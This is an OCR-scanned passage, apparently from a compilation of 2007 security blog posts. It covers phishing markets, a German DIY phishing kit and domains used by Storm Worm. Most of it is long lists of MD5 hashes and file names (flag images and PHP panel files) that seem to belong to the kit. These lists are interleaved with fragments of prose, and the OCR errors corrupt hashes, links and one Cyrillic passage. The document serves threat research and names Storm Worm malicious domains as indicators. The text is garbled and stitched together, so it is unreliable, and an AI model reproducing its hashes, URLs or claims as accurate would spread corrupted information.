5349673c83420f65faac21f9ee14a7d2 
be.gif 
e2697c0d2f33f4c8ca85dac762734cfc 
bf.gif 
d10e907a9fb8487940f6c5d350dde6ae 
bg.gif 
f6e51fba28e2744b678ffd752d75f945 
bh.gif 
b8aeb3f5a24a277ea6c826cd4113e2ee 
bi.gif 
fe5f4500cf4baefld65a424e8d5689bc 
bj.gif 
97af4afce5fd166559201493f6848c47 
bm.gif 
06045f155dd3b1d22cd28b86e57de479 
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bn.gif 
43948655b170b8e063f023620d97c76b 


bo.gif 
9c4ef78c1b8051c0038227e04705c871 
br.gif 
667c1c786e5365ealff2c5lbaed8e6a7 
bs. gif 
1bc0alb6cf00a50bb9bf3588d84b321¢c 
bt.gif 

995226c86da889b7 7ee9fa9c60bee399 
bv. gif 
e023614ca4df2ed1be0dacf9f736826a 
bw. gif 
d4232256a8374cff569021c5351301be 
by.gif 
23f79b7553f5cdcc90f3bcelf7feld0c 
bz. gif 
2ab46e28a4d3084d7620e0aaecf4c235 
ca.gif 
c1c24f48ac653bf3f07423fd12ecd11f 
cd.gif 
b74241ecd992051a41c456f3e6ec2ad3 
cf.gif 
fdd15d7a37c8e885b731d6f7c8c67dc6 
cg.gif 
62a3129d39d66d648580fbeeflfce60f 
ch.gif 
a9aa4db50f1d232d494610110455e98d 
ci.gif 
0f8d3618f8a62d914f0f792a83c2c687 
ck.gif 
edafceaaf10f5f387523fd27915628e7 
cl.gif 

65341 ffddf87323b55fdff8bb115bc75 
cm.gif 
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- A Survey of the Operations of the Phishing Market : 


"We have conducted extensive research to uncover phishing networks. The result is detailed 
analysis from 3,900,000 phishing e-mails, 220,000 messages collected from 13 key phishing- 
related chat rooms, 13,000 chat rooms and 48,000 users, which were spidered across six chat 
networks and 4,400 compromised hosts used in botnets." 


The research once again demonstrates the diversity of phishing techniques used, and covers 
the following segments - Webservers used in phishing attacks; Institutions by advertising rate; 
Institutions by report rate, and perhaps the most interesting part is an IRC visualization of 
underground social networks for trading of stolen digital goods. 


Furthermore, it’s great to note that it’s not just vendors actively researching [7]the average 
time a phishing site 


- Anonumupne DNS-ceppepa gna KaxK oro akkayHTa; 
- ExecyTouHHli 6bsKan JaHHHX Ha cepBep B apyrom HII. 


[8]remains online, but also, third-party researchers such as [9]Richard Clayton and [10]Tyler 
Moore at the Security Research Computer Laboratory, University of Cambridge with some re- 
cently released research notes. It’s one thing to consider the daily reality of malware and 
phishing pages hosted on infected home users’ PCs, another to see malicious parties offering 
fast-flux networks on demand while vendors are figuring out how to timely shut down the pages, 
but totally out of the blue to see such a party - the always on malicious service is ironically 
down - offering phishing hosting and spam sending in between child porn and zoofilia hosting. 


http: //ddanchev. blogspot .com/2007/07/confirm-your-gullibility.htm 
http: //radar.oreilly.com/archives/2007/01/spamonomics_101.htm 
ttp://ddanchev.blogspot.com/2007/03/underground-economys-supply-of- goods .htm 


ttp://ddanchev. blogspot .com/2007/02/phishing- ecosystem. htm 
http: //ddanchev.blogspot.com/2007/08/diy-phishing-kits .htm 
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Di 
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1bb0670559a2676fd42dfdef3a7b1b/7f 
cn.gif 
12a79273092a0a93adbfe9b685634e5f 
co.gif 
966dc7ed9306794734a2e61438f89744 
cr.gif 
c5fa3319590501d12afd4e16b4ed81b0 
cu.gif 
a40b55eeca54fe5605f06d194b179d3a 
cv.gif 
d26c9fc27103d723586ba616057460dd 
cy.gif 
d8dd4cfcd2570984219c9826d417ee9a 
cz.gif 
3c706c7f9d3bb30ae2df290c8a9be3e7 
de.gif 
1f31389417402bf187e3276579adcfcl 
dj.gif 
c7bf7379f87e9aac8c045ed3bf58da23 
dk. gif 
8337faebf55a6e5b297aff95517147a9 
dm.gif 
6f33e31ac969168d9431cc865001la21a 
do.gif 
d50d679037a133f49533abd436aac790 
dz.gif 
fd8b3e3a882012c111c387b4a24c201b 
ec.gif 
6d213134a8af6250fe5b269d16b52967 
ee. gif 
3e3f7d30e9e58b2c98f6f5d7f7be164c 
eg.gif 
9600de10fc4779b7873d463e4a5188e9 
er.gif 
238dde43e7077fade86597999e6046c2 
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es. gif 
4fc4c91dbb8012db776af9b476c4elcd 
et. gif 
737dc12da78a0b27b999544a41b8c954 
eu. gif 
6a257a89ee638d66865664ee968ff7 2c 
fi.gif 
Oaae04dbd30720f6bd155ce7840910e3 
fj.gif 
a825cdf6cdc75877a2748201e0d14874 
fk.gif 
a2d83821d143ce2c35e48c9e9ef021e4 
fm.gif 
5cbe429c604ede636f93f9e3e65d2d3e 
fo. gif 
adc678b55e1l6ee1c8e4363e1fd764086 
fr.gif 
7f66797472eb9360e0bd22bfcfb9delf 
ga.gif 
96de40e3362ec03980171a6b347755e4 
gb. gif 
93cb87bcf85c3b2756f6b296494cbc37 
gd.gif 
83810a8a9a36dfla42a7e2df644b07e2 
ge. gif 
ac87f86413d9e214be3de0d3820cfla7 
gh.gif 
6e506c781480alef5eb80a5f415c300a 
gi.gif 
26f676e5676155claal1278e3c0e2ede6 
gl.gif 
220ba9d5444b958512cf8c14e6f3664d 
gm.gif 
6b71edef56d177266bd076cda58def7e 
gn.gif 
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c07acd5a538c11ec4933de155b5341a2 


gp.gif 
d12f295c5396a57c3ca27de5e46b1f94 
gq.gif 
303063fca23a70f425dc923ce3f34b30 
gr.gif 
cee23846c8603623882ed5134406806c 
gt.gif 
9b5e92154496a88f1cal0648454977af 
gu.gif 
d8ee6ee605a30ddadafb179000fle62b 
gw.gif 
7008cdb584b4983fbf7458de392f3b82 
gy. gif 
e0745abf42d852da0588adeab822c002 
hk.gif 

83301 f5dfebf29cd5aca49a6272240c8 
hm.gif 
3a24264185daf6e8c307d523a544e5ac 
hn.gif 
99b20f53c38c2f36de5677946e7cb042 
hr.gif 
39cac2f2e2e6a9f41f89026442287682 
ht.gif 
99b88b35b9310162500f187da64b579e 
hu.gif 
3212a65eba5018fdee554234c45fb5ff 
id.gif 
a3fe271b1dec3d96fd3cebce6591c840 
ie.gif 
d0101b97df3644ac8ef40780ca5cdf8b 
il. gif 


ce092caal539ae185ae407fbc543cd5c 
im.gif 
in.gif 
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3f042¢528c4bf957777be35f6b18c691 


io.gif 
35b9c8f05cObce96ae295cd97997bb43 
iq.gif 
43a114c7298e15308378fe959f94f3ed 
ir.gif 
2a8da57126b658e256ce5b93c6949b83 
is.gif 
142622e0042666bac6eebeaf8c8e53ec 
it.gif 
72b0c360b078e4b7d58840c12ec89525 
je.gif 
64dcc7081f35b7c08f4eacf253ebe3e0 
jm.gif 
b71f782c24a3caf90d61119fc2a03ade 
jo.gif 
9ee5f4d1e42146b658b84b3ddd99119c 
jp.gif 
531e4982260e50c173872d32553b9d91 
ke. gif 
27481845c6081487f2b67fc7754f8944 
kg.gif 
20261977ecf77a413b7565ada8el26fa 
kh. gif 
10324ab7e6a04171269da2092333d4e6 
ki. gif 
3367e0e37cf04ef726ed4f31cbb255b1 
km.gif 
17361663c32c0a3571775c60f54b5861 
kn.gif 
c5a0cc06a7a96c002b2aa69c85b128a0 
kp.gif 
83172c1241cad924321c27151533316d 
kr.gif 


27612726647e7e783763ad85fbf407c5 
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kw. gif 
f58f3613420bee6129e2967e18989839 
ky. gif 
cc6c838c50ec7d1lec09f4c59537f2c05 
kz.gif 
c9a29f216dc2aeb3f73f7b50b7 7a4b4f 
la.gif 
66ac74583c1859ea55fe34a81c73c304 
lb.gif 
6b7a372934ffc86493ae4daadaa67501 
Ic.gif 
4ff65704775e685024c149a9b86787e0 
li. gif 
7cffdd4b033b2e5534789c0471a29l1lee 
Ik.gif 
d9eee6b3fcc3d011b684d422ccfd6e38 
Ir.gif 
€2623c89857fd31be09af4f4f713b73c 
Is.gif 
bcbb085a5dff8f8e84cb04a140281745 
It. gif 
d4487bf9895cfbal4176c57f966050a3 
lu.gif 
€333c2b38ad7dbec56be0ea95460al2c 
lv.gif 
514de74dc630c59838c4406dbc6f3815 
ly.gif 
ad9d25d33cfa64c074d4afce1944a7a3 
ma.gif 
a64b6726eecb6c97cdc7d9e99F9I7F58b 
mc.gif 
b078930a4bc2282c3669e0af905513dd 
md.gif 
d10c62b50e2d991f4229d01613bf64ba 
mg.gif 
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1fd3270525bef3c2209e0a3bcfcef238 


mh.gif 
65cb04da9b025288c09d06208b748581 
mk.gif 
8046e9ba9370efa3c5f7312000d0a608 
ml.gif 
82a7c7d6956cfaa9ec2f2b0b679d15al 
mm.gif 
25009266f5706ef498422ad4b41b5cla 
mn.gif 
75afb51335f3a965ff7f1b4435c6828c 
mo.gif 
8b4d9ee4b065403e3efa837ab3fc3d79 
mp.gif 
£7536c02354a2aa29ad117a0e317046b 
mq.gif 
31a6497822781lafecafcO8efdb911459 
mr.gif 
09c5b268ee3421d9a36330ecal8f27ed 
ms. gif 
639022bebfa4985f543eb4c7c55cb4c9 
mt.gif 
b630e0faea7c9db87aeef9cae912d573 
mu.gif 
938ac0665ff92512fd5clle4b99eaabd 
mv. gif 
45aaaab68ef5628a951laaf7a8465c78e 
mw.gif 
2da84fc76988ed6d3d09d46d6d71d6dd 
mx.gif 
d3d43f8b958739b00582aa117b7b0d5f 
my. gif 
809e20fabeadfa4fédfaf629bfe32786 
mz.gif 


169b88a2d2e2b61074725cafcdb02137 
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na.gif 
7879034a66005c6362f2dd6e76006903 
nc.gif 
1891dd4e9799a25058fe59c2ae6bcab6c 
ne.gif 
9f8f0b3e38b4b388cd1a876991632f25 
nf.gif 
76521b2845914c88e6ae0d70623d1fdd 
ng.gif 
d97fe7f8986ada525dc000848a63f904 
ni.gif 
97196c326f4192d80fb0370c2eb14bd3 
nl.gif 
96199acdb50773fe45dfdbc31078ea4c 
no.gif 
d98132d9186daf717fea60b515391dbb 
np.gif 
563b2a18cc772e8152588f1593e62296 
nr.gif 
43990e2c126fd5fab663ebff4aeb7abe9 
nz.gif 
3156460b6b5711d6eed7f7d8cc2ab5a7 
om.gif 
82a30a1754878742cc4f2d53a321bb18 
pa.gif 

2cb5e6357313398ff7 769acdc246d5a5 
pf.gif 
fod8fc23d9eba2d1e25bd045bbe460a0 
pg.gif 
f8640f7168928cb4186fcOb3ffe91975 
ph.gif 
cec4d7560e2d08926359d2e87 7f3a76c 
pk.gif 
5cb1ff3e37207a760e2ecf45a5bb81d7 
pl.gif 
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a929046f3f0c7781989a284371a7f43b 


pm.gif 
82147e98807c03773c0b68356172814d 
pr.gif 
b4c3c92d6f14d845e5bd6ef808992e75 
ps.gif 
ed8543ef592caa4d4a0ca3b636d52449 
pt.gif 
ae548aa692ef71a331afe943026e111d 
pw. gif 
6a3alfc091aa71fc473277a02dccdd2c 
py.gif 
479edce4532bd36f766bd29a346ee0c2 
qa.gif 
6ad5b83645bf557fe570894f453f432a 
re. gif 
61864922b44209614eae99f8a83da65c 
ro.gif 
ac04fb14afaae3bc4449a5401c3517e0 
ru.gif 
daa2a635125539998a491f04ce53dc60 
rw. gif 
87a0642d680c7ac4ae82a86c6850e80a 
sa.gif 
bbd932aea9265abf5815b74dd9446de4 
sb. gif 
C41690739c4f92af9e065e81690a2356 
sc.gif 
70b6c4f0F7bab3090a45cc9a8668e92F 
sd.gif 
aef2c6903b36e52b667bb0baa52604fc 
se. gif 
63ff75c06900689a5d43ab931bc82662 
sg.gif 


d89f586fb81c9a9cf9cdf95013F73908 
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si.gif 
4f311a4b0a39db339be74a2f354d3799 


sk.gif 
01d603424483cf66ca867ba0flc9fec4 
SI.gif 
a8alca018798069590c0f8cb5796fc65 
sm.gif 
6330955519623fed6262d632956c66e0 
sn.gif 
14faa28a0e44dfc2727dfe228ee84a34 
So.gif 
5d8348e7a2fal302ff6a4a3fod2bfea6 
sr.gif 
cb7f3cc497f4067d09a0d61070c937ff 
st.gif 
d0889a94d96bee4541ea661e7e3b6626 
sv.gif 
1930fal4df40af4fd6ab9d60db7al3ed 
sy.gif 
73380e84dc753e6cfd5b3d19219024d3 
Sz.gif 
6ec7660bea2f18ffc26555f43d0f6ad8 
tc.gif 
5d456951dcf4eb341117c87857a20848 
td.gif 
c20e167cd531be6237422594b4072cd8 
tf.gif 
444a919ef49a1170cf6abf766f067054 
tg.gif 
6aa920611047a1bc48d722a896ae9466 
th.gif 


b525712cc1014c12071aa555b29d9654 
Thumbs.db 
73192a66bc2e7196ac196ef24c39fe75 
tj.gif 
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ac1c06b195a17e9408472c15a5c086cd 


tm.gif 
42d945e3bce87e24a005ac96f7 79aeb7 
tn.gif 
f7d1ccddc14b1b2754f19c5eb2d51a56 
to.gif 
lee074e0dbbb595647270dbced8a8743 
tp. gif 
e668c8b8ab6f7668410c90fffb7c4d8ab 
tr.gif 
23c0420906ac063753138c20bacd3ela 
tt. gif 
87decec956e1fc484b1a8b1716326b25 
tv.gif 
67e92c1c2cd1222fd607c9f91435883e 
tw. gif 
cf5c19a25cb1dd17f9d47b362d98e0a4 
tz.gif 
ef039d9935ecda27125f0fd39212ad44 
ua. gif 
1cc325bedc5df0920efedda54a184fdc 
ug. gif 
174636bd284c8d7f06638767bb84b6fd 
uk.gif 
39526cd54b55fba7910702d6a0061c90 
um.gif 
4546517ece394c3c8a22f8b7ed54ad81 
us. gif 
a5a63b0486b82f067e8cfcbf254a989b 
uy. gif 
275a0eccdca2720e84afa23054b5d371 
uz.gif 
9bb72b0eaaee6bab1de26f9b53624a86 
va.gif 


4fccba188125599f6448f8e0b71d0677 
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6. http://www. cloudmark.com/releases/docs/the_economy_of_phishing. pdf 


7. http: //ddanchev. blogspot .com/2007/07/average-online-time-for-phishing-sites.htm 


8. http: //ddanchev. blogspot .com/2007/07/average-online-time-for-phishing-sites.htm 
9. http://www. lightbluetouchpaper. org/2007/08/16/phishing-and-the-gaining-of-clue 
10. http: //www.lightbluetouchpaper . org/2007/08/24/phishing-website-removal-comparing-banks 


3.8.21 DIY Phishing Kits (2007-08-29 15:21) 


Build Server: Build script.php: 
Hier den Pfad der script.php M ithilfe d ipt.php wird 


angeben: : il an die hier 


http: //yourhost.com/script. php 
Build Server 


Host 


User Name 


C:\Dokumente und Einstellun eS 


Upload 


In times when [1]socially oriented bureaucrats are prompting such popular projects as [2]the 
KisMAC and [3]the Default Password List to seek hosting in [4]a foreign country, the German 
scene seems to be very active with yet another [5]DIY phishing kit released in the wild 
which I'll dicuss in this post, following the first rather primitive one | came across to a while 
ago. As we’ve seen with a previous phishing kit, and the infamous Rock Phish, malicious 
economies of scale in terms of efficiently generating fake pages to be forwarded to a central 
logging location are the second most important goal of this trend. What’s the first? It’s noise 
generation compared to the common wisdom that such tools are supposed to be exclusive 
and private. Talking about the [6]economics of phishing, with the already a commodity scam 
pages available at the phishers’ disposal, fast-flux hosting of the pages and maintaining 
their "online lifetime", thus playing a cat and mouse game with researchers [7]and vendors 
shutting [8]them down, is perhaps the next stage in further developing the phishing ecosystem. 
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vc.gif 
bc56207f7daf99ac171e85c3ca85e43b 


ve.gif 
f1082562cd7ee5776e6e732cc7220889 
vg.gif 
5f89b155213d1c29181d06da33a974f8 
vi.gif 
b30d88bf20ffc5c75a254ab25b4c562c 
vn.gif 
5bf8dfaf74506f3d89aa4ab6fd9c4e211 
vu. gif 

b1924aea4986245f3c6e7 70e8de1b843 
ws.gif 
a027ff7cdd02b873d271f8d5lab89ae8 
ye.gif 
ee7fb77f702f0182de807f188138a152 
yu.gif 
6a7e5fbc9e3ac06b720eea3387477771 
za.gif 
37d219e52bce3b94891821896c71699a 
zm.gif 
al6bced0ab9ae9b874d4c0c35c36b918 
zr.gif 
c66f4e607dbc3158243360d69856f827 
zw.gif 


8d31cf8ee73d6c4e8fdd3c8382d01549 
Thumbs.db 
409b33e6713363836123fd833121c4f5 
vote _middle.gif 
31bbd8b3354f3370d3e4378393af1074 
iconbluarw.gif 
91ladd62ac978f82640bb2a7e6e51da7f 
iconbluarwdbl.gif 
389b0cf405761a535284603ee3858c84 
iconbluarwdblr.gif 


10193 


d4d3ea80294dfc7329b6b7da34dff66a 
iconbluarwr.gif 
91b03cb3e6781lafbfe50764cae84092a 
icongryarw.gif 
3f21b9f11137cc5f709005264f36685e 
icongryarwdbl. gif 
148397e0a2442d180e45cd6958b007e2 
icongryarwdblr.gif 
Obleeb34f57e0ab628fea56b07873536 
icongryarwr.gif 
Of1fd118e5a2d46aa076c9e5890abe72 
Thumbs.db 
f9f444f7c9elee793ef1400ae69f2aal 
inc.footer.php 
d580abb41lebab18c22afc15681a4669a 
inc.header.php 
3d472ceb5dd4dd7b064955dbfd32c20f 
inc.headerhtml.php 
ac474df5708a5cad281559a5227fa31f 
inc.headerphp.php 
f5749875d2cd80dfb749ecd24c2aad1c 
style.css 
859babad221958b7921e42c1280c5b46 
index.html 

lib.csource.php 
fa3de712c50483725bf3a052be7bd5cf 
lib.functions.php 
lda3afe63039fc610249c4f15c32e410 
lib. placeholder.php 
55860e1f632eacleb5afa8800abc01d9 
get.php 
21b8e8a90998cbc1f55a532adeaf4659 
inc.config.php 
c59999c2dc17a0d2c3a07c3b97dc1d0d 
index.php 

10194 


60630164282f0746fa691846dd5743d6 
mysqldb.sq| 
9ee3507cb60e4b60c4bd313032e33851 
ReadMe.txt 
101c46a04079cb29b39b9c9a7e89eca8 
change _pass.php 
62bb8b56d3c1cd195963022fef5caea4 
clear _db.php 
d9101271f0e4093d1970515857090279 
help.php ObOaaf130c642275fa324606c840ced0 
index.php 
2fc516d3856ee0116250781fc0a79dfb 
ip _stat.php 
40e241c3a2f59aad03753f5445a41911 
lang.php 99928aece6d41c447aa98b666c5a6fd1 
login.php 
1948fac64fdcc387b8fccdd231d06d8f 
logout.php 
621b0fd4737d48378de7e142e5a09ee0 
user manager.php 
3c455e714fbd7c8148d6247810f5360a 
ad.gif 
b6b1e9619ed7289fba573e8d889d3819 
ae. gif 
b42e6f37ba2e059876e9cad6c8afbd98 
af.gif 
ccaf2f8cd19e558d2cb925e37b120f20 
ag.gif 
f60877160a45fe086b5943d487144b23 
ai.gif 
e9f155a292785d401d472c25a2735f39 
al.gif 
2379c017b4858d90f900b3564a88b72e 
am.gif 
6a2e3d4ac7139f1665ec85daf905c4fb 


10195 


an.gif 
3felba098d2bd5f85c996ea0a5d7dd5a 
ao.gif 
3a30af9a98cf20e6619eeE234e8c7f929 
aq. gif 
23507525ab4e7d1023a3a6940790d9c6 
ar.gif 
2940a84a15b26e5ee37fa29a89947228 
as. gif 
e56e28dec792c71b32cb7299ebd83751 
at.gif 
cadc74036384cda59ee91d99bdcfdd69 
au. gif 
b91b6739c8107e29680568ef8ff952f9 
aw. gif 
8e91812abcd372b3a32e7c16c15dd8ed 
az. gif 
64c82a7cafccd37a526f7745b915b8aa 
ba.gif 
1c8a23d4d9ed0f8decf5eea261e631b5 
bb. gif 
ae7aadd035a40e5026a777e2ecdbd5f5 
bd.gif 
5349673c83420f65faac21f9ee14a7d2 
be. gif 
e2697c0d2f33f4c8ca85dac762734cfc 
bf. gif 
d10e907a9fb8487940f6c5d350dde6ae 
bg. gif 

f6e51fba28e2744b67 8ffd752d75f945 
bh. gif 
b8aeb3f5a24a277ea6c826cd4113e2ee 
bi.gif 
fe5f4500cf4baefld65a424e8d5689bc 
bj.gif 

10196 


97af4afce5fd166559201493f6848c47 


bm.gif 
06045f155dd3b1d22cd28b86e57de479 
bn.gif 
43948655b170b8e063f023620d97c76b 
bo.gif 
9c4ef78c1b8051c0038227e04705c871 
br.gif 
667c1c786e5365ealff2c51lbaed8e6a7 
bs.gif 
1bc0alb6cf00a50bb9bf3588d84b321¢c 
bt.gif 
995226c86da889b77ee9fa9c60bee399 
bv. gif 
e023614ca4df2ed1be0dacf9f736826a 
bw.gif 
d4232256a8374cff569021c5351301be 
by. gif 
23f79b7553f5cdcc90f3bcelf7feld0c 
bz.gif 
2ab46e28a4d3084d7620e0aaecf4c235 
ca.gif 
c1c24f48ac653bf3f07423fd1i2ecd11f 
cd.gif 
b74241ecd992051a41c456f3e6ec2ad3 
cf.gif 
fdd15d7a37c8e885b731d6f7c8c67dc6 
cg.gif 
62a3129d39d66d648580fbeef1lfce60f 
ch.gif 
a9aa4db50f1d232d494610110455e98d 
ci.gif 
0f8d3618f8a62d914f0f792a83c2c687 
ck. gif 


edafceaaf10f5f387523fd27915628e7 
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cl.gif 
65341 ffddf87323b55fdff8bb115bc75 


cm.gif 
1bb0670559a2676fd42dfdef3a7b1b/7f 
cn.gif 
12a79273092a0a93adbfe9b685634e5f 
co.gif 
966dc7ed9306794734a2e61438f89744 
cr.gif 
c5fa3319590501d12afd4e16b4ed81b0 
cu.gif 
a40b55eeca54fe5605f06d194b179d3a 
cv.gif 
d26c9fc27103d723586ba616057460dd 
cy.gif 
d8dd4cfcd2570984219c9826d417ee9a 
cz. gif 
3c706c7f9d3bb30ae2df290c8a9be3e7 
de. gif 
1f31389417402bf187e3276579adcfcl 
dj.gif 
c7bf7379f87e9aac8c045ed3bf58da23 
dk.gif 
8337faebf55a6e5b297aff95517147a9 
dm.gif 
6f33e31ac969168d9431cc865001a21a 
do.gif 
d50d679037a133f49533abd436aac790 
dz.gif 
fd8b3e3a882012c111c387b4a24c201b 
ec.gif 
6d213134a8af6250fe5b269d16b52967 
ee. gif 
3e3f7d30e9e58b2c98f6f5d7f7be1l64c 
eg.gif 


10198 


9600de10fc4779b7873d463e4a5188e9 
er.gif 
238dde43e7077fade86597999e6046c2 
es. gif 
4fc4c91dbb8012db776af9b476c4elcd 
et.gif 
737dc12da78a0b27b999544a41b8c954 
eu.gif 
6a257a89ee638d66865664ee968Ff7 2c 
fi.gif 
Oaae04dbd30720f6bd155ce7840910e3 
fj.gif 
a825cdf6cdc75877a2748201e0d14874 
fk.gif 
a2d83821d143ce2c35e48c9e9ef021e4 
fm.gif 
5cbe429c604ede636f93f9e3e65d2d3e 
fo.gif 
adc678b55e16ee1c8e4363e1fd764086 
fr.gif 
7f66797472eb9360e0bd22bfcfb9delf 
ga.gif 
96de40e3362ec03980171a6b347755e4 
gb.gif 
93cb87bcf85c3b2756f6b296494cbc37 
gd.gif 
83810a8a9a36dfla42a7e2df644b07e2 
ge.gif 
ac87f86413d9e214be3de0d3820cfla7 
gh.gif 
6e506c781480alef5eb80a5f415c300a 
gi.gif 
26f676e5676155claal1278e3c0e2ede6 
gl.gif 
220ba9d5444b958512cf8c14e6f3664d 
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gm.gif 
6b71edef56d177266bd076cda58def7e 
gn.gif 
c07acd5a538c11ec4933de155b5341a2 
gp.gif 
d12f295c5396a57c3ca27de5e46b1f94 
gq.gif 
303063fca23a70f425dc923ce3f34b30 
gr.gif 
cee23846c8603623882ed5134406806c 
gt.gif 
9b5e92154496a88f1cal1064845497 7af 
gu. gif 
d8ee6ee605a30ddadafb179000fle62b 
gw.gif 
7008cdb584b4983fbf7458de392f3b82 
gy.gif 
e0745abf42d852da0588adeab822c002 
hk.gif 
83301f5dfebf29cd5aca49a6272240c8 
hm.gif 
3a24264185daf6e8c307d523a544e5ac 
hn.gif 
99b20f53c38c2f36de5677946e7cb042 
hr.gif 
39cac2f2e2e6a9f41f89026442287682 
ht. gif 
99b88b35b9310162500f187da64b579e 
hu. gif 
3212a65eba5018fdee554234c45fb5ff 
id.gif 
a3fe271b1dec3d96fd3cebce6591c840 
ie.gif 
d0101b97df3644ac8ef40780ca5cdf8b 
il.gif 
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ce092caal539ae185ae407fbc543cd5c 
im.gif 

in.gif 
3f042c528c4bf957777be35f6b18c691 
io.gif 
35b9c8f05cObce96ae295cd97997bb43 
iq.gif 
43a114c7298e15308378fe959f94f3ed 
ir.gif 
2a8da57126b658e256ce5b93c6949b83 
is.gif 
142622e0042666bac6eebeaf8c8e53ec 
it. gif 
72b0c360b078e4b7d58840c12ec89525 
je.gif 
64dcc7081f35b7c08f4eacf253ebe3e0 
jm.gif 
b71f782c24a3caf90d61119fc2a03ade 
jo.gif 
9ee5f4d1e42146b658b84b3ddd99119c 
jp.gif 
531e4982260e50c173872d32553b9d91 
ke.gif 
27481845c6081487f2b67fc7754f8944 
kg.gif 
202b1977ecf77a413b7565ada8el26fa 
kh. gif 
10324ab7e6a04171269da2092333d4e6 
ki.gif 
3367e0e37cf04ef726ed4f31cbb255b1 
km.gif 
17361663c32c0a3571775c60f54b5861 
kn.gif 
c5a0cc06a7a96c002b2aa69C85b128a0 
kp.gif 


10201 


83172c1241cad924321¢c27151533316d 


kr.gif 
27b12726647e7e783763ad85fbf407c5 
kw.gif 
f58f3613420bee6129e2967e18989839 
ky.gif 
cc6c838c50ec7d1lec09f4c59537f2c05 
kz.gif 
c9a29f216dc2aeb3f73f7b50b7 7a4b4f 
la.gif 
66ac74583c1859ea55fe34a81c73c304 
lb.gif 
6b67a372934ffc86493ae4daadaa6/501 
Ic.gif 
4ff65704775e685024c149a9b86787e0 
li.gif 
7cffdd4b033b2e5534789c0471a291ee 
Ik. gif 
d9eee6b3fcc3d011b684d422ccfd6e38 
Ir.gif 
€2623c89857fd31be09af4f4f713b73c 
Is.gif 
bcbb085a5dff8f8e84cb04a140281745 
It. gif 
d4487bf9895cfbal4176c57f966050a3 
lu.gif 
c333c2b38ad7dbec56be0ea95460al2c 
lv.gif 
514de74dc630c59838c4406dbc6f3815 
ly.gif 
ad9d25d33cfa64c074d4afce1944a7a3 
ma.gif 
a64b6726eecb6c97cdc7d9e99F97F58b 
mc.gif 


b078930a4bc2282c3669e0af905513dd 
10202 


File size: 5844992 bytes 
MD5: ae3a3cbb873c69843455c46ad6e62f40 
SHA1: 7606b3cccbb3cccb95bbe32b688e350d42aeffc5 


Related posts: 
[9]Pharming Attacks Through DNS Cache Poisoning 
[10]DIY Pharming Tools 


1 
2. 

3 

4 

5; ‘ 

6. 


ttp://ddanchev.blogspot.com/2007/08/diy-phishing-kits.htm 
ttp://ddanchev.blogspot.com/2007/08/economics-of-phishing. htm 


7. http://ddanchev. blogspot .com/2007/03/take-this-malicious-site-down.htm 

8. http: //ddanchev. blogspot . com/2007/04/taking-down-phishing-sites-business.htm 
9 
10. 


3.8.22 Storm Worm’s use of Dropped Domains (2007-08-29 17:05) 


The daily updated Bleedingthreats.org’s [1]Rules to block Storm worm DNS and C &C keeps 
growing at a significant speed, and with the group behind [2]Storm Worm constantly [3]chang- 
ing the social engineering tactics - but continuing to exploit already patched vulnerabilities 
in case the user doesn’t self infect herself - anti virus vendors are literally crunching out 
new signatures for yet another Storm Worm variant. Reactive response is a daily reality, 
however, proactive response such as making sure your customers cannot have their browsers 
automatically exploited even if they follow Storm Worm’s IP links, is far more pragmatic, and 
the results can be easily evaluated while the mass mailing campaign is still active online. 
Here’s [4]an interesting list especially the fact that pretty much all of these domains were 
purchased as "dropped" ones, and are again part of the BYDLOSHKA campaign with a static 
domain.com/ind.php structure : 


tushove.com; tibeam.com; kqfloat.com; snbane.com; yxbegan.com; snlilac.com; qavoter.com; 
ptowl.com; wxtaste.com; eqcorn.com; Itbrew.com; bnably.com; fncarp.com 


The obfuscated javascript exploiting the browser vulnerabilities still includes [5]loffensive 
language against an anti virus vendor. Moreover, in case you remember the second Storm 
Worm wave had a very creative feature, namely to [6Jautomatically inject a malicious URL in 
a forum or blog post, right after the infected party has authenticated herself in order for the 


1023 


md.gif 
d10c62b50e2d991f4229d01613bf64ba 
mg.gif 
1fd3270525bef3c2209e0a3bcfcef238 
mh. gif 
65cb04da9b025288c09d06208b748581 
mk.gif 
8046e9ba9370efa3c5f7312000d0a608 
ml.gif 
82a7c7d6956cfaa9ec2f2b0b679d15al 
mm.gif 
25009266f5706ef498422ad4b41b5cla 
mn.gif 
75afb51335f3a965ff7f1b4435c6828c 
mo. gif 
8b4d9ee4b065403e3efa837ab3fc3d79 
mp.gif 
*7536c02354a2aa29ad117a0e317046b 
mq.gif 
31a6497822781lafecafcO8efdb911459 
mr.gif 
09c5b268ee3421d9a36330ecal8f27ed 
ms.gif 
639022bebfa4985f543eb4c7c55cb4c9 
mt. gif 

b630e0faea7c9db8 7aeef9cae912d573 
mu.gif 
938ac0665ff92512fd5clle4b99eaabd 
mv.gif 
45aaaab68ef5628a951laaf7a8465c78e 
mw.gif 
2da84fc76988ed6d3d09d46d6d71d6dd 
mx.gif 
d3d43f8b958739b00582aa117b7b0d5f 
my.gif 


10203 


809e20fabeadfa4fédfaf629bfe32786 
mz.gif 
169b88a2d2e2b61074725cafcdb02137 
na.gif 
7879034a66005c6362f2dd6e76006903 
nc. gif 
1891dd4e9799a25058fe59c2ae6bcabc 
ne. gif 
9f8f0b3e38b4b388cd1a876991632f25 
nf. gif 
76521b2845914c88e6ae0d70623d1fdd 
ng.gif 
d97fe7f8986ada525dc000848a63f904 
ni.gif 
97196c326f4192d80fb0370c2eb14bd3 
nl.gif 
96199acdb50773fe45dfdbc31078ea4c 
no.gif 
d98132d9186daf717fea60b515391dbb 
np.gif 
563b2a18cc772e8152588f1593e62296 
nr.gif 
43990e2c126fd5fa663ebff4aeb7abe9 
nz.gif 
3156460b6b5711d6eed7f7d8cc2ab5a7 
om.gif 
82a30a1754878742cc4f2d53a321bb18 
pa.gif 
2cb5e6357313398ff7769acdc246d5a5 
pf. gif 
fod8fc23d9eba2d1e25bd045bbe460a0 
pg. gif 
f8640f7168928cb4186fcOb3ffe91975 
ph.gif 
cec4d7560e2d08926359d2e87 7f3a76c 
10204 


pk. gif 
5cb1ff3e37207a760e2ecf45a5bb81d7 


pl.gif 
a929046f3f0c7781989a284371a7f43b 
pm.gif 
82147e98807c03773c0b68356172814d 
pr.gif 
b4c3c92d6f14d845e5bd6ef808992e75 
ps.gif 
ed8543ef592caa4d4a0ca3b636d52449 
pt.gif 
ae548aa692ef71a331lafe943026e111d 
pw.gif 
6a3alfc0O91aa71fc473277a02dccdd2c 
py. gif 
479edce4532bd36f766bd29a346ee0c2 
qa.gif 
6ad5b83645bf557fe570894f453f432a 
re.gif 
61864922b44209614eae99f8a83da65c 
ro.gif 
